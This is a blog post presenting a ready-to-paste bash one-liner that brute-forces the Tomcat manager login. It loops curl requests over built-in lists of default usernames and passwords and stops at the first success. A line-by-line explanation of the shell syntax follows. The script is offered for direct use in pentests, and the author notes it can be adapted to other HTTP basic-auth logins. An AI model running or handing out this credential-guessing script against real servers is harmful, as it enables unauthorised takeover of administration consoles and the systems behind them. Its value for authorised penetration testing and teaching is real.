0

Tomcat default credentials dictionary attack [One-Liner]

Quick and Dirty one-liner to perform a dictionary attack against Tomcat manager.

There are many better and faster ways to perform this attack like using burp or coding it on a proper scripting language (indeed I have my own version on python) but I’m an ‘one-liner’ lover, I perform several pentests and I like to have one-liners just to copy&paste instead of transferring scripts from one place to other, so below you can find some pros and cons.

Pros:

  • Just copy and paste on a bash shell.
  • The only dependency is curl that normally you can find it installed by default on any linux system.
  • Bash syntax .
  • Usernames and Passwords dictionary included (easily expanded).
  • HTTP and HTTPS support.
  • This code can be modified to be used against others HTTP basic authentications.
  • If supported by the terminal the output it’s colored.

Cons:

  • Not to fast.

 

USERS=(admin tomcat Admin manager both root role1 role administrator) ; PASSWORDS=(admin tomcat password Password1 administrator s3cr3t manager root changethis password1 r00t role1 s3cret toor letmein 12345 123456 1234567890 12345678 P@ssw0rd P@ssw0rd1 qwerty) ; echo -e "\033[38;5;81mIngresa URL del /manager/html\033[m\n" ; read -p "> " URL ;echo ; for u in ${USERS[@]};do for pwd in ${PASSWORDS[@]};do echo -ne "\033[33m[+]\033[m $u:$pwd" ; (curl -skLI $URL -u $u:$pwd | grep -q '200 OK') && { echo -e "\t\033[1;32mSuccess\033[m" && kill -INT $$; }   || echo  ;done ;done

 

Example:

 

Line disassembling:

If there is someone interested on learning a lil’ bit of shell scripting and how this line works, below you can find a quick explanation.

 

  • Creation of USERS and PASSWORDS arrays that contains the dictionary of words to be tested. On shell scripting an array it’s created like this; ARRAY=(value1 value2 valueN)
  • ANSI & escape sequence format: If supported by the terminal you can color your scripts easily by interpreting escape sequence with ‘echo‘ command (-e option allow this), the escape sequence is \033[VALUE1;VALUE2m or \e[VALUE1;VALUE2m (I’m using \033 to have some compatibility with Mac Operating systems) and the VALUE is the number of the format style that is being applied.
  • With ‘read‘ command I’m asking for a value and saving it to URL variable.
  • I create 2 nested for loops that will iterate through USERS and PASSWORDS arrays. To read all ARRAYS’ values it’s done through ${ARRAY[@]} syntax.
  • Then some more debug colored printing.
  • I use ‘curl‘ command with some options (s/k/L/I/usilent (no statistics output)/Ignore bad SSL certificates (If the URL is not HTTPS the option it’s ignored)/Follow redirections/Do a HEAD request instead of GET/HTTP basic credentials using username:password format) and then I look for a ‘200 OK‘ status message with grep that will tell me if the credentials are correct. All these commands are run on a subshell inside ‘()‘.
  • I review the status of last command execution that it’s from the subshell and if it was successful (&&) I print a message and stop the process, but if it fails (||), then I just print a newline (echo).
  • As a additional note, the way I break the nested loops is by using ‘kill -INT $$‘ inside ‘{}‘. I do it this way because first of all I can’t do it inside parenthesis because it will be a subshell and it will be on a child process and ‘break‘ will only escape the first loop. All of this is because the way it’s interpreted on one line and by using && and ||.

 

That’s it, hopefully you can find this useful as it is for me.

@hecky

hecky

Leave a Reply

Your email address will not be published. Required fields are marked *